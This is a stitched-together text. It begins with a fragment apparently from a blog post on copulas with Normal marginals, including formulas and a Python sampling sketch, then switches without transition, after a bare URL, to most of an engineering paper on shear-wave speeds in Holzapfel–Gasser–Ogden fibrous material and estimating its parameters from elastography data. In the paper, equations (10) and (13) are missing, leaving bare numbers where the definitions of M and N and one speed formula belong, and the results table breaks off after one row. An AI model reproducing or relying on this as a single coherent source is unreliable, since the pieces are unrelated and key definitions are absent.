In our example, we can prove that the joint distribution of $(Y,Z)$ is not bivariate Normal, although the marginal distributions are Normal indeed.
Then you may wonder how to construct more examples like this, that is, $Y,Z$ are both $N(0,1)$ random variables, but $(Y,Z)$ is not bivariate Normal. This is an interesting question, and in fact, it’s closely related to the Copula model. Here I only give some specific examples, while the details about the Copula model may be provided in future posts.
Consider functions
$$C_1(u,v)=[\max(u^{-2}+v^{-2}-1,0)]^{-1 / 2}$$
$$C_2(u,v)=\exp(-[(\ln u)^2+(\ln v)^2]^{1 / 2})$$
$$C_3(u,v)=-\ln\left(1+\frac{(e^{-u}-1)(e^{-v}-1)}{e^{-1}-1}\right)$$
and use $\Phi(y)$ to denote the c.d.f. of $N(0,1)$ distribution, then $C_1(\Phi(y),\Phi(z))$, $C_2(\Phi(y),\Phi(z))$ and $C_3(\Phi(y),\Phi(z))$ are all joint distribution functions that satisfy 1) not bivariate Normal and 2) marginal distributions are $N(0,1)$.
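As a concrete illustration (my own sketch, not from the original post): $C_1$ has the form of a Clayton copula with parameter $\theta=2$, which can be sampled by the standard conditional-distribution method; pushing the margins through $\Phi^{-1}$ then gives a pair $(Y,Z)$ with standard Normal marginals but a non-Normal joint distribution:

```python
import random
from statistics import NormalDist

random.seed(42)
theta = 2.0  # C1(u, v) = (u^-2 + v^-2 - 1)^(-1/2) is a Clayton copula with theta = 2
ndist = NormalDist()

ys, zs = [], []
for _ in range(50_000):
    u = random.random()
    w = random.random()
    # Conditional-distribution sampling for the Clayton copula:
    # v = [u^-theta * (w^(-theta/(1+theta)) - 1) + 1]^(-1/theta)
    v = (u ** -theta * (w ** (-theta / (1 + theta)) - 1) + 1) ** (-1 / theta)
    ys.append(ndist.inv_cdf(u))  # marginal is N(0,1) by construction
    zs.append(ndist.inv_cdf(v))  # marginal is N(0,1), joint is NOT bivariate Normal

mean_y = sum(ys) / len(ys)
mean_z = sum(zs) / len(zs)
print(mean_y, mean_z)
```

Both marginals come out standard Normal, yet the pair has strong lower-tail dependence, which no bivariate Normal can reproduce.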
Seems good, right?
https://solarenergyengineering.asmedigitalcollection.asme.org/biomechanical/article/142/5/051010/958441/Shear-Wave-Propagation-and-Estimation-of-Material

## Abstract
This paper describes the propagation of shear waves in a Holzapfel–Gasser–Ogden (HGO) material and investigates the potential of magnetic resonance elastography (MRE) for estimating parameters of the HGO material model from experimental data. In most MRE studies the behavior of the material is assumed to be governed by linear, isotropic elasticity or viscoelasticity. In contrast, biological tissue is often nonlinear and anisotropic with a fibrous structure. In such materials, application of a quasi-static deformation (predeformation) plays an important role in shear wave propagation. Closed form expressions for shear wave speeds in an HGO material with a single family of fibers were found in a reference (undeformed) configuration and after imposed predeformations. These analytical expressions show that shear wave speeds are affected by the parameters ($\mu_0$, $k_1$, $k_2$, $\kappa$) of the HGO model and by the direction and amplitude of the predeformations. Simulations of corresponding finite element (FE) models confirm the predicted influence of HGO model parameters on speeds of shear waves with specific polarization and propagation directions. Importantly, the dependence of wave speeds on the parameters of the HGO model and imposed deformations could ultimately allow the noninvasive estimation of material parameters in vivo from experimental shear wave image data.
## 1 Introduction
Elastographic techniques, including both ultrasound elastography and magnetic resonance elastography (MRE), have great potential for noninvasive evaluation of the mechanics of soft tissues. Harmonic MRE is based on MR (magnetic resonance) imaging of shear waves induced by external vibration of the tissue, followed by inversion of the displacement fields to estimate material parameters. MRE has been used to quantify noninvasively the material properties of many biological tissues, such as skeletal muscle [1], liver [2,3], and brain [4]. Most MRE studies use linear elastic or viscoelastic material models, and typically the material is assumed to be isotropic. Recently, MRE has been extended to use anisotropic material models, such as a three-parameter model [5–7] for nearly incompressible, transversely isotropic (TI), fibrous materials. However, these models still rely on the assumptions of linear elasticity, while many biological tissues exhibit nonlinear stress–strain relationships [8].
Nonlinear hyperelastic models have been successfully applied to describe the mechanics of soft biological materials [9,10]. The Holzapfel–Gasser–Ogden (HGO) model in particular is straightforward and widely used to model fibrous soft tissues [11,12]; it contains separate terms to describe the contributions of fiber deformation to the strain energy, and can model an isotropic nonlinear material (with $κ$ = 1/3), or a strongly anisotropic material with single or multiple “families” of fibers. Estimating the parameters of hyperelastic models from experimental data remains an important challenge. Here, we demonstrate that wave speed data, such as those available from MRE studies, can be used for this purpose.
Shear waves in MRE consist of infinitesimal dynamic deformations, which may be superimposed on larger, quasi-static “predeformations.” Shear wave speeds in a nonlinear material are determined by both its mechanical properties and its deformation state. In this study, closed-form expressions for shear wave speeds in the HGO model are obtained in terms of the model parameters and imposed predeformations. Analytical expressions for wave speeds were confirmed by performing finite element (FE) simulations of shear waves in a predeformed cube of HGO material with a single fiber family. Local frequency estimation (LFE) was used to estimate speeds of shear waves with various polarization and propagation directions from simulated displacement fields. Finally, we demonstrate, using simulated data, the feasibility of estimating the material parameters of the HGO model from shear wave speeds.
## 2 Theoretical Methods
### 2.1 Wave Speeds in Transversely Isotropic Elastic Materials.
Shear wave speeds in an elastic material are calculated from the eigenvalues of the acoustic tensor [13,14], as in the following equation:
$\rho c^{2}\,\mathbf{m}=\mathbf{Q}\cdot\mathbf{m}$
(1)
where $\rho c^{2}$ is the eigenvalue of the acoustic tensor $\mathbf{Q}$, $\rho$ is the density of the material, $c$ is the shear wave speed, $\mathbf{n}$ is the propagation direction of the wave, and $\mathbf{m}$ is the polarization direction vector of the shear wave. The acoustic tensor $\mathbf{Q}$ for a specific propagation direction, $\mathbf{n}$, is obtained from Eq. (2) [13,14] below:
$\mathbf{Q}=\mathbf{n}\cdot\mathbb{A}\cdot\mathbf{n}$
(2)
where $\mathbb{A}$ is a fourth-order elasticity tensor which relates the incremental strain tensor, $\tilde{\varepsilon}$, and incremental stress tensor, $\tilde{\sigma}$. In Cartesian coordinates, this relationship can be expressed in indicial notation, $\tilde{\sigma}_{pi}=A_{piqj}\tilde{\varepsilon}_{qj}$. For nonlinear models, such as the HGO model, the components of the elasticity tensor can be obtained from the relationship $A_{piqj}=F_{p\alpha}F_{q\beta}\,\partial^{2}W/(\partial F_{i\alpha}\partial F_{j\beta})$, where $\mathbf{F}$ is the deformation gradient tensor, which accounts for the effects of predeformation [13,14], and $W$ is the strain energy function. Thus, in principle, shear wave speeds can be used to estimate material parameters.
Since the acoustic tensor, $\mathbf{Q}$, depends on the propagation direction, $\mathbf{n}$, in general wave speeds depend on $\mathbf{n}$. Also, $\mathbf{Q}$ may have up to three distinct eigenvalues (wave speeds) and three corresponding eigenvectors (polarization directions), so that there may be three plane waves that propagate in the same direction. However, material symmetries and constraints reduce the number of possible wave speeds. In an isotropic linear elastic material with shear modulus $\mu$ and bulk modulus $K$, the acoustic tensor is the same for all propagation directions, and only two wave speeds exist: one longitudinal and one transverse (shear). Longitudinal waves in isotropic materials have $c^{2}=(K+4\mu/3)/\rho$ [15], and polarization parallel to the propagation direction ($\mathbf{m}=\mathbf{n}$); corresponding shear waves have $c^{2}=\mu/\rho$ and polarization $\mathbf{m}\perp\mathbf{n}$. In an isotropic, incompressible linear elastic material, the longitudinal wave speed becomes infinite, and only one parameter, $\mu$, remains to estimate.
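For a rough sense of scale, these two expressions can be evaluated for soft-tissue-like values (illustrative numbers only; they match the simulation defaults used later in Sec. 2.4):

```python
import math

rho = 1000.0    # density, kg/m^3
mu = 1.0e3      # shear modulus, Pa (1 kPa, a soft-tissue-like value)
K = 1.0e4 * mu  # bulk modulus of a nearly incompressible material

c_shear = math.sqrt(mu / rho)               # c^2 = mu / rho
c_long = math.sqrt((K + 4 * mu / 3) / rho)  # c^2 = (K + 4*mu/3) / rho

# The longitudinal wave is ~100x faster here, which is why it is effectively
# invisible at MRE wavelengths and only the shear wave is imaged.
print(c_shear, c_long)
```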
Fig. 1
A linear elastic, TI material requires five parameters to describe its constitutive behavior. These can be, for example, two tensile moduli ($E_1$, $E_2$), two shear moduli ($\mu_1$, $\mu_2$), and a bulk modulus ($K$). If the material is incompressible, three parameters are sufficient, for example, the baseline shear modulus ($\mu_2$) and two ratios: the shear anisotropy $\phi_{TI}=\mu_1/\mu_2-1$ and the tensile anisotropy $\zeta_{TI}=E_1/E_2-1$. In a linear elastic, nearly incompressible, TI material, in which anisotropy is due to a single family of aligned fibers, the shear wave speed depends in a relatively simple fashion on the material properties and the wave propagation direction relative to the fibers [15]. Shear waves can be separated into slow and fast shear waves with different polarization directions (Fig. 1). The slow and fast shear wave polarization directions under no predeformation are defined by the following relationship:
$\mathbf{m}_{s}=\dfrac{\mathbf{n}\times\mathbf{a}}{|\mathbf{n}\times\mathbf{a}|},\qquad \mathbf{m}_{f}=\mathbf{n}\times\mathbf{m}_{s}$
(3)
where $\mathbf{n}$ is the propagation direction of the shear wave, $\mathbf{a}$ is the fiber orientation after deformation, and $\mathbf{m}_{s}$ and $\mathbf{m}_{f}$ are the slow and fast polarization directions, respectively. The corresponding wave speeds in this linear elastic material, which depend on the angle, $\theta$, between the fiber and propagation directions, are
$c_{s}^{2}=\dfrac{\mu_{2}}{\rho}\left(1+\phi_{TI}\cos^{2}\theta\right);\qquad c_{f}^{2}=\dfrac{\mu_{2}}{\rho}\left(1+\phi_{TI}\cos^{2}2\theta+\zeta_{TI}\sin^{2}2\theta\right)$
(4)
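A quick numerical check of these expressions (a sketch; the values of $\mu_2$, $\phi_{TI}$, and $\zeta_{TI}$ are illustrative, not taken from the paper): for propagation along the fibers ($\theta=0$) the slow and fast speeds coincide, while across the fibers ($\theta=\pi/2$) only the fast wave is stiffened by the fibers.

```python
import math

rho = 1000.0  # density, kg/m^3
mu2 = 1.0e3   # baseline (transverse) shear modulus, Pa
phi = 1.0     # shear anisotropy, mu1/mu2 - 1   (illustrative)
zeta = 2.0    # tensile anisotropy, E1/E2 - 1   (illustrative)

def c_slow(theta):
    # Eq. (4): c_s^2 = (mu2/rho) * (1 + phi * cos^2(theta))
    return math.sqrt(mu2 / rho * (1 + phi * math.cos(theta) ** 2))

def c_fast(theta):
    # Eq. (4): c_f^2 = (mu2/rho) * (1 + phi * cos^2(2theta) + zeta * sin^2(2theta))
    return math.sqrt(mu2 / rho * (1 + phi * math.cos(2 * theta) ** 2
                                    + zeta * math.sin(2 * theta) ** 2))

# Along the fibers (theta = 0) the two speeds coincide; across the fibers
# (theta = pi/2) the slow wave does not feel the fibers at all.
print(c_slow(0.0), c_fast(0.0))
print(c_slow(math.pi / 2), c_fast(math.pi / 2))
```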
### 2.2 The Holzapfel–Gasser–Ogden Model.
The Holzapfel–Gasser–Ogden model, an influential recent model for fibrous soft tissues, was proposed by Holzapfel and co-workers [17]. The strain energy density function is a sum of isotropic and anisotropic terms
$W=W_{iso}+W_{aniso}$
(5)
The isotropic part of the strain energy density function contains both volumetric and isochoric terms
$W_{iso}=W_{vol}+W_{isochoric},\qquad W_{vol}=\dfrac{K}{2}(J-1)^{2},\quad W_{isochoric}=\dfrac{\mu}{2}\left(\bar{I}_{1}-3\right)$
(6)
where $K$ and $\mu$ are the bulk modulus and the isotropic shear modulus, respectively, and $\bar{I}_{1}$ is the modified first invariant defined by $\bar{I}_{1}=J^{-2/3}I_{1}$ $(J=\det\mathbf{F})$, where $I_{1}$ is the first invariant of the Cauchy–Green strain tensor $\mathbf{C}$. Many soft materials have shear moduli roughly between $10^{2}$ and $10^{5}$ Pa, spanning cellular collagen and fibrin gels [18–21], brain tissue [22,23], and muscle [24]. Anisotropic terms in the strain energy density function can have different forms depending on the fiber arrangement:
1. Single fiber-family model (TI): Terms in the strain energy density function reflect the effects of fibers with a distribution of orientations centered on the unit vector $\mathbf{a}_{0}$, which is the fiber direction before predeformation:
$W_{aniso}^{HGO1}=\dfrac{k_{1}}{2k_{2}}\left\{\exp\left[k_{2}\left(\kappa\bar{I}_{1}+(1-3\kappa)\bar{I}_{4}-1\right)^{2}\right]-1\right\},\quad \text{for } \bar{I}_{4}>1$
(7)
where $\bar{I}_{4}$ is the modified pseudo-invariant defined by $\bar{I}_{4}=J^{-2/3}I_{4}$, and $I_{4}=\mathbf{a}_{0}\cdot\mathbf{C}\cdot\mathbf{a}_{0}$ is the squared stretch in the fiber direction.
2. Multiple fiber-family model (orthotropic): Additional fiber families (with a principal direction of $\mathbf{a}_{0}^{i}$, and the same properties $k_{1}$, $k_{2}$, and $\kappa$) can be modeled by adding contributions from $I_{4}^{i}=\mathbf{a}_{0}^{i}\cdot\mathbf{C}\cdot\mathbf{a}_{0}^{i}$ to the strain energy, as
$W_{aniso}^{HGON}=\sum_{i}\dfrac{k_{1}}{2k_{2}}\left[\exp\left(k_{2}\bar{E}_{i}^{2}\right)-1\right];\quad \bar{E}_{i}=\kappa\bar{I}_{1}+(1-3\kappa)\bar{I}_{4}^{i}-1,\quad \text{for } \bar{I}_{4}^{i}>1$
(8)
The effects of $k_{1}$ and $k_{2}$ on stress–strain behavior in simple shear are shown in Fig. 2. For example, for simple shear $\gamma_{YZ}$ in a plane containing fibers at an angle of $\pi/4$ ($\mathbf{a}=(\mathbf{j}+\mathbf{k})/\sqrt{2}$), $k_{1}$ describes the initial slope of the curve (Fig. 2(a)), and $k_{2}$ describes the nonlinearity of the curve (Fig. 2(b)).
Fig. 2
Fiber distributions corresponding to different values of $\kappa$ are shown in Fig. 3; $\kappa$ captures the distribution of the fiber orientations, ranging from alignment in a single direction ($\kappa=0$) to no preferred direction ($\kappa=1/3$). When $\kappa=0$, all fibers are assumed to be perfectly aligned, and when $\kappa=1/3$, the material is isotropic. We note that, formally, fibers in the HGO model do not contribute to the stress or to the strain energy when they are in compression ($I_{4}<1$). We did not model the bilinearity between fiber tension and compression for wave propagation in the HGO model in the undeformed case (assuming that the fibers can resist an infinitesimal compressive strain in wave propagation, or equivalently, an infinitesimal tensile prestrain).
Fig. 3
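The anisotropic energy term is straightforward to evaluate directly. Below is a sketch for simple shear $\gamma_{YZ}$ with fibers at $\pi/4$ in the $YZ$-plane; the invariants $I_1=3+\gamma^2$ and $I_4=1+\gamma+\gamma^2/2$ are hand-derived for this geometry (not quoted from the paper), and the parameter values are the simulation defaults from Sec. 2.4:

```python
import math

k1, k2, kappa = 2000.0, 5.0, 1 / 12  # simulation defaults from Sec. 2.4

def w_aniso(gamma):
    """Anisotropic HGO energy, Eq. (7), for simple shear gamma_YZ with fibers
    at pi/4 in the YZ-plane. For this geometry J = 1, so the modified
    invariants equal the ordinary ones: I1 = 3 + g^2, I4 = 1 + g + g^2/2."""
    i1 = 3 + gamma ** 2
    i4 = 1 + gamma + gamma ** 2 / 2
    e = kappa * i1 + (1 - 3 * kappa) * i4 - 1  # vanishes at gamma = 0
    return k1 / (2 * k2) * (math.exp(k2 * e ** 2) - 1)

# The fiber energy is zero in the reference state and stiffens rapidly
# (faster than quadratically) as shear increases, through k2:
print([round(w_aniso(g), 2) for g in (0.0, 0.1, 0.2, 0.3)])
```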
### 2.3 Closed-Form Expressions for the Relationships Between Model Parameters and Wave Speeds
#### 2.3.1 Closed-Form Expressions for Speeds of Waves Superimposed on Simple Shear.
Closed-form expressions that relate wave speeds to model parameters are highly desirable. Such expressions for the HGO model were determined from analytical solution of the eigenvalue problem (Eq. (1)) for shear waves propagating in the negative Z-direction ($\mathbf{n}=-\mathbf{k}$, Fig. 4) in the undeformed configuration (Fig. 4(a)) and with imposed predeformations in simple shear corresponding to the configurations of Figs. 4(b) and 4(c). Symbolic solutions were obtained using the MATLAB Symbolic Toolbox (MathWorks, Natick, MA)
$c_{s}^{XZ}=\sqrt{\dfrac{\mu}{\rho}+\dfrac{2k_{1}}{\rho}\gamma_{XZ}^{2}M^{2}\exp\left(M^{2}k_{2}\gamma_{XZ}^{4}\right)}$
(9)
(10)
$c_{s}^{YZ}=\sqrt{\dfrac{\mu}{\rho}+\dfrac{2k_{1}}{\rho}\gamma_{YZ}M\left(\gamma_{YZ}M+N\right)\exp\left[\left(\gamma_{YZ}M+N\right)^{2}k_{2}\gamma_{YZ}^{2}\right]}$
(11)
$c_{f}^{YZ}=\sqrt{\dfrac{\mu}{\rho}+\dfrac{k_{1}}{\rho}\left[N^{2}+6\gamma_{YZ}MN+6\gamma_{YZ}^{2}N^{2}+2\gamma_{YZ}^{2}\left(2\gamma_{YZ}M+N\right)^{2}\left(\gamma_{YZ}M+N\right)^{2}\right]\exp\left[\left(\gamma_{YZ}M+N\right)^{2}k_{2}\gamma_{YZ}^{2}\right]}$
(12)
where $(c_{s}^{XZ}$, $c_{f}^{XZ})$ and $(c_{s}^{YZ}$, $c_{f}^{YZ})$ are the slow and fast shear wave speeds for predeformations $\gamma_{XZ}$ and $\gamma_{YZ}$, respectively. The terms $M$ and $N$ are combinations of the dispersion parameter $\kappa$ and the angle $\phi$ between the fiber and the propagation direction:
(13)
Fig. 4
With no imposed predeformation ($\gamma_{XZ}=\gamma_{YZ}=0$), the speeds reduce to
$c_{s}=c_{0}=\sqrt{\dfrac{\mu}{\rho}};\qquad c_{f}=\sqrt{\dfrac{\mu}{\rho}+\dfrac{k_{1}N^{2}}{\rho}}$
(14)
#### 2.3.2 Closed-Form Expressions for Speeds of Waves Superimposed on Stretching.
Expressions for the speeds of slow and fast shear waves superimposed on isochoric, static lengthening deformations (Fig. 5) were also obtained. In this situation, the maximum stretch ratio, $\lambda_{1}=\lambda$, is used to describe the imposed deformation; the other stretches are $\lambda_{2}=\lambda_{3}=1/\sqrt{\lambda}$. Wave speeds were obtained with the help of the MATLAB Symbolic Toolbox (MathWorks, Natick, MA)
$c_{f}^{Z}=\sqrt{\lambda^{2}\dfrac{\mu}{\rho}+\dfrac{k_{1}}{\rho}\lambda\left(\lambda^{2}N^{2}+\lambda^{2}ML+2N^{2}L^{2}k_{2}\right)\exp\left(k_{2}L^{2}\lambda^{2}\right)}$
(15)
$c_{s}^{Z}=\sqrt{\lambda^{2}\dfrac{\mu}{\rho}+\lambda ML\dfrac{k_{1}}{\rho}\exp\left(k_{2}L^{2}\lambda^{2}\right)}$
(16)
where $(c_{s}^{Z}$, $c_{f}^{Z})$ are the slow and fast shear wave speeds for stretch $\lambda$ in the Z-direction. The definitions of $M$ and $N$ are from Eq. (13). $L$ is defined in terms of $M$ and the stretch ratio $\lambda$
$L=\left(\lambda-1\right)\left(M^{2}\lambda^{2}+\lambda+1\right)^{-1}$
(17)
Fig. 5
With no imposed predeformation ($λ=1$), the wave speed expressions can be simplified, as above, to
$c_{s}=c_{0}=\sqrt{\dfrac{\mu}{\rho}};\qquad c_{f}=\sqrt{\dfrac{\mu}{\rho}+\dfrac{k_{1}N^{2}}{\rho}}$
(18)
which are identical to Eq. (14).
### 2.4 Computational Modeling and Simulations.
To verify the analytical results, FE simulations of shear wave propagation were performed using finite element software (COMSOL Multiphysics v5.3, Burlington, MA). A static predeformation step (either (i) simple shear or (ii) tension) and a frequency-domain perturbation step were performed in a cubic domain (50 × 50 × 50 mm$^3$, Figs. 4 and 5). The HGO model was implemented in COMSOL to model the elastic behavior; an isotropic loss factor of 0.1 was used to provide a small amount of viscoelastic damping. We set the frequency of excitation to 200 Hz, in order to provide multiple wavelengths in the model domain. The domain was discretized into 5000 hexahedral elements. To demonstrate convergence, the results were confirmed at higher resolution. In order to compare the undeformed case to the cases with finite predeformation, we assume the fibers can resist infinitesimal compressive loads during wave motion. A periodic boundary condition was applied on the $XZ$-plane and $YZ$-plane, for fast and slow shear waves, respectively. The periodic boundary conditions eliminate boundary effects on the vertical sides of the cube, allowing for a closer comparison of the analytical and numerical results. The assigned default parameters are as follows: predeformation $\gamma_{XZ}=\gamma_{YZ}=0.2$; initial isotropic shear modulus, $\mu_{0}=1$ kPa; density, $\rho=1000$ kg/m$^3$; initial anisotropy ratio, $k_{1}/\mu_{0}=2$; nonlinearity parameter, $k_{2}=5$; fiber dispersion parameter, $\kappa=1/12$; and ratio of bulk modulus to initial shear modulus, $K/\mu_{0}=10^{4}$. To obtain either slow or fast shear waves, a harmonic displacement (simple shear case) or harmonic force (lengthening/shortening cases) was imposed on the top surface in the corresponding polarization direction, defined by the $\mathbf{m}_{s}$ or $\mathbf{m}_{f}$ unit vector, respectively. The LFE method [25] was applied to estimate the wavelength (and thus wave speed) from the simulated data.
LFE provides an estimate of wave speed at each “voxel” in a discretized version of the 3D wave field. The mean values and standard deviations of wave speeds from all voxels in a central region of interest are used to generate the symbols and error bars in plots [25,26]. The LFE parameters used in this study are $\rho_{0}=1$ for the center frequency and $L_{0}=11$ for the number of filters [26].
## 3 Results: Shear Wave Speeds in Undeformed and Deformed Configurations
Figure 6 shows the simulation results for slow and fast shear waves propagating in the negative Z-direction in the undeformed configuration and with shear predeformation in the $YZ$- or $XZ$-plane. Shear predeformation in either the $YZ$- or $XZ$-plane (Figs. 6(e) and 6(f)) increases the wavelength of the fast shear wave compared to the undeformed configuration (Fig. 6(d)), corresponding to an increase in the fast wave speed.
Fig. 6
Shear wave speeds from analytical predictions and simulation estimates are compared for the three configurations of Figs. 4 and 5, shown in Figs. 7–10 below. In each configuration, one parameter was varied while holding the remaining parameters at the default values given above. The vertical axes of the panels in the top row of each figure display $c_{f}/c_{0}$, the normalized ratio between the fast shear wave speed and the initial wave speed $c_{0}=\sqrt{\mu_{0}/\rho}$, where $\mu_{0}=1000$ Pa is the initial isotropic shear modulus and $\rho$ is the density of the material. Similarly, the vertical axes of the panels on the bottom row of each figure depict the ratio $c_{s}/c_{0}$ between the slow shear wave speed and the initial wave speed. Results are shown for ranges of the isotropic shear modulus $\mu$, the HGO model parameters $k_{1}$ and $k_{2}$, the dispersion parameter $\kappa$, and the imposed shear, $\gamma$. In each figure, solid lines without error bars (orange in the online version) depict the analytical predictions, and solid lines with error bars (blue in the online version) display the corresponding wave speeds estimated from FE simulations.
Fig. 7
Fig. 8
Fig. 9
Fig. 10
### 3.1 One Family of Fibers in the Undeformed Configuration.
Figure 7 shows the relationships between shear wave speeds and the parameters of the HGO model in the undeformed configuration. The horizontal axis represents three normalized parameters ($\mu/\mu_{0}$, $k_{1}/\mu_{0}$, $\kappa$) of the HGO model. There is no effect of changing $k_{2}$ or $\gamma$ because no predeformation is applied. The fast wave speed increases with increasing $k_{1}$ and $\mu$ and decreases with increasing $\kappa$. In contrast, the slow wave speed is affected only by $\mu$.
### 3.2 One Fiber Family With Predeformation by Simple Shear in the $YZ$-Plane.
Figure 8 shows the dependence of wave speed on HGO parameters when simple shear predeformation is imposed in the $YZ$-plane, i.e., in the direction that induces fiber stretch. The horizontal axis of each panel displays values of one of the four parameters ($\mu/\mu_{0}$, $k_{1}/\mu_{0}$, $\kappa$, $k_{2}$) in the HGO model or the magnitude of shear, $\gamma_{YZ}$. The slow and fast wave speeds all increase with increasing $k_{1}$, $k_{2}$, $\mu$, and $\gamma_{YZ}$, and decrease with increasing fiber dispersion, $\kappa$. The fast wave speed is larger than the slow wave speed due to the stiffening effect of the fibers.
### 3.3 One Fiber Family With Predeformation by Simple Shear in the $XZ$-Plane.
The effects of the HGO parameters on shear wave speeds are illustrated in Fig. 9 for the configuration in which predeformation is applied perpendicular to the original fiber axis. The vertical axis of each panel on the top row shows the (normalized) fast wave speed, and on the bottom row the slow wave speed. The horizontal axis of each panel shows the value of the HGO model parameter or the magnitude of shear. Wave speed is influenced by all five parameters: $\mu/\mu_{0}$, $k_{1}/\mu_{0}$, $\kappa$, $k_{2}$, and $\gamma_{XZ}$. Similar to predeformation in the $YZ$-plane, the fast wave speed increases with increasing $\mu/\mu_{0}$, $k_{1}/\mu_{0}$, $k_{2}$, $\gamma_{XZ}$ and decreases with increasing $\kappa$. Slow wave speeds follow the same trend as the fast wave speeds, but to a lesser extent.
### 3.4 One Fiber Family With Predeformation Consisting of Imposed Extension.
The effect of stretch ratio on wave speed is shown in Fig. 10 for the case of imposed extension. Both fast and slow wave speeds increase with stretch ratio and the simulation results agree well with the analytical predictions.
## 4 Estimation of Parameters in the Holzapfel–Gasser–Ogden Model
In Sec. 2.3, we demonstrated that shear wave speeds can be calculated analytically from parameter values of the HGO model, for specific propagation and polarization directions. We also confirmed that the analytical solutions agree with simulated wave speeds in a finite cube-shaped domain. Conversely, the parameters of the HGO model can, in principle, be estimated from measured shear wave speeds, for given propagation and polarization directions, in predeformed specimens. In Sec. 4.1, we demonstrate the feasibility of this approach to parameter estimation.
### 4.1 Estimation Method.
The example system is shown in Fig. 11. The angle $\phi$ of the fiber axis is chosen to be $\pi/4$ radians from the base of the specimen in the undeformed configuration, as in Figs. 4 and 5. The propagation direction $\mathbf{n}$ is along the negative Z-axis, and the fiber direction $\mathbf{a}$ is in the $YZ$-plane. Experiments are separated into two steps. In the first step, the fast and slow wave speeds are measured without predeformation, by applying horizontal, harmonic displacements to the top surface in the fast or slow polarization directions. The slow wave speed is a function of only the isotropic shear modulus, $\mu$, and density, $\rho$, but the fast wave speed is a function of $\mu$, $k_{1}$, and $\kappa$ (Eq. (19)). In the second step, the fast and slow wave speeds are measured after applying a predeformation of simple shear in the $YZ$-plane. In this configuration, both fast and slow wave speeds are functions of all five parameters ($\mu$, $k_{1}$, $k_{2}$, $\kappa$, and $\gamma_{YZ}$) (Eq. (20))
$c_{s0}=\sqrt{\mu/\rho};\qquad c_{f0}=f(k_{1},\mu,\kappa)$
(19)
$c_{s}=f(k_{1},k_{2},\mu,\kappa,\gamma_{YZ});\qquad c_{f}=f(k_{1},k_{2},\mu,\kappa,\gamma_{YZ})$
(20)
Fig. 11
For the analogous situation using imposed extension (stretch ratio $λ$), Eq. (20) can be written as
$c_{s}=f(k_{1},k_{2},\mu,\kappa,\lambda);\qquad c_{f}=f(k_{1},k_{2},\mu,\kappa,\lambda)$
(21)
In the proposed experiment, the density $\rho$ of the material is known, and the simple shear ratio $\gamma_{YZ}$ (or stretch ratio $\lambda$) can be controlled and measured. For a single value of the predeformation, the four independent equations can be solved simultaneously to determine the four unknown parameters. If more data are available, the over-determined system can be solved in the least-squares sense. The MATLAB optimization function lsqnonlin for solving nonlinear least-squares problems was used to find parameters that minimized the difference between predicted and measured values of wave speed.
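For the no-predeformation step, Eq. (14) can be inverted in closed form, which makes the logic of the first estimation step transparent: the slow speed yields $\mu$ directly, and the fast speed then yields $k_1$ once the geometric factor $N$ (Eq. (13)) is known. A minimal sketch (the numerical value of $N$ here is an arbitrary assumption, chosen only for the round-trip demonstration):

```python
import math

rho = 1000.0  # density, kg/m^3, assumed known

def speeds_undeformed(mu, k1, N):
    """Forward model, Eq. (14): slow/fast speeds with no predeformation."""
    c_s0 = math.sqrt(mu / rho)
    c_f0 = math.sqrt(mu / rho + k1 * N ** 2 / rho)
    return c_s0, c_f0

def estimate(c_s0, c_f0, N):
    """Invert Eq. (14): mu from the slow wave, then k1 from the fast wave."""
    mu = rho * c_s0 ** 2
    k1 = rho * (c_f0 ** 2 - c_s0 ** 2) / N ** 2
    return mu, k1

# Round trip with the paper's default mu and k1 (N = 0.6 is a placeholder):
N = 0.6
cs, cf = speeds_undeformed(1000.0, 2000.0, N)
mu_hat, k1_hat = estimate(cs, cf, N)
print(mu_hat, k1_hat)
```

The deformed configurations (Eqs. (20) and (21)) add $k_2$ and $\kappa$ to the system, which is why a nonlinear least-squares solver is needed for the full fit.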
### 4.2 Sensitivity to Noise.
Because experimental data inevitably contain noise or measurement errors, it is necessary to quantify the robustness of parameter estimates. For each wave speed estimate, random noise was applied from a normal distribution, as shown in the following equation:
$c_{f(noise)}=c_{f}(1+\psi\tau)$
(22)
$c_{s(noise)}=c_{s}(1+\psi\tau)$
(23)
Here, $\tau$ is a random value drawn from the standard normal distribution (mean = 0, standard deviation = 1), and $\psi$ is a noise factor that controls the noise variance. In this paper, noise is defined at three levels: values of $\psi$ = 0.01, 0.02, and 0.03 correspond to wave speed variation ranges of $\pm 3.3\%$, $\pm 6.6\%$, and $\pm 10\%$ from the expected values, respectively.
For wave speed data without noise, the material parameters can be determined from the four equations corresponding to two configurations: the undeformed configuration and one value of predeformation. However, if wave speed data are noisy, more data are needed. In a Monte Carlo approach, ten additional simulated experiments with different predeformations were added to the original two simulated experiments, and these simulated experiments were repeated 1000 times with different random noise realizations. For various noise levels, the mean values ($\pm$ standard deviation) of all four parameters were calculated (Tables 1 and 2). To improve accuracy, outliers (greater than three standard deviations from the mean) were excluded from the wave speed data.
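The noise model of Eqs. (22) and (23) and the Monte Carlo loop can be sketched end-to-end for the two parameters recoverable without predeformation (a simplified stand-in for the full five-parameter fit; $\psi=0.01$ as in the first rows of the tables, and $N$ is an assumed geometry factor):

```python
import math
import random
import statistics

random.seed(0)
rho, mu_true, k1_true, N = 1000.0, 1000.0, 2000.0, 0.6  # N assumed known
cs_true = math.sqrt(mu_true / rho)
cf_true = math.sqrt(mu_true / rho + k1_true * N ** 2 / rho)

psi = 0.01  # noise factor: c_noisy = c * (1 + psi * tau), tau ~ N(0, 1)
mu_hats, k1_hats = [], []
for _ in range(1000):
    cs = cs_true * (1 + psi * random.gauss(0, 1))  # Eq. (23)
    cf = cf_true * (1 + psi * random.gauss(0, 1))  # Eq. (22)
    mu_hats.append(rho * cs ** 2)                  # invert Eq. (14) for mu
    k1_hats.append(rho * (cf ** 2 - cs ** 2) / N ** 2)  # ... and for k1

# Report mean +/- standard deviation, as in Tables 1 and 2:
print(statistics.mean(mu_hats), statistics.stdev(mu_hats))
print(statistics.mean(k1_hats), statistics.stdev(k1_hats))
```

Even in this toy version, $k_1$ inherits noise from both measured speeds while $\mu$ depends on only one, mirroring the pattern in the tables where $k_1$ estimates scatter far more than $\mu$ estimates.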
Table 1
Comparison of HGO model parameter estimates for different noise levels (imposed shear)

| Noise level | $\mu$ (Pa) | $k_1$ (Pa) | $\kappa$ | $k_2$ |
| --- | --- | --- | --- | --- |
| Expected | 1000 | 2000 | 0.083 | 5 |
| $\psi$ = 0.01 | $1000 \pm 11$ | $2034 \pm 367$ | $0.083 \pm 0.023$ | $5 \pm 0.0$ |
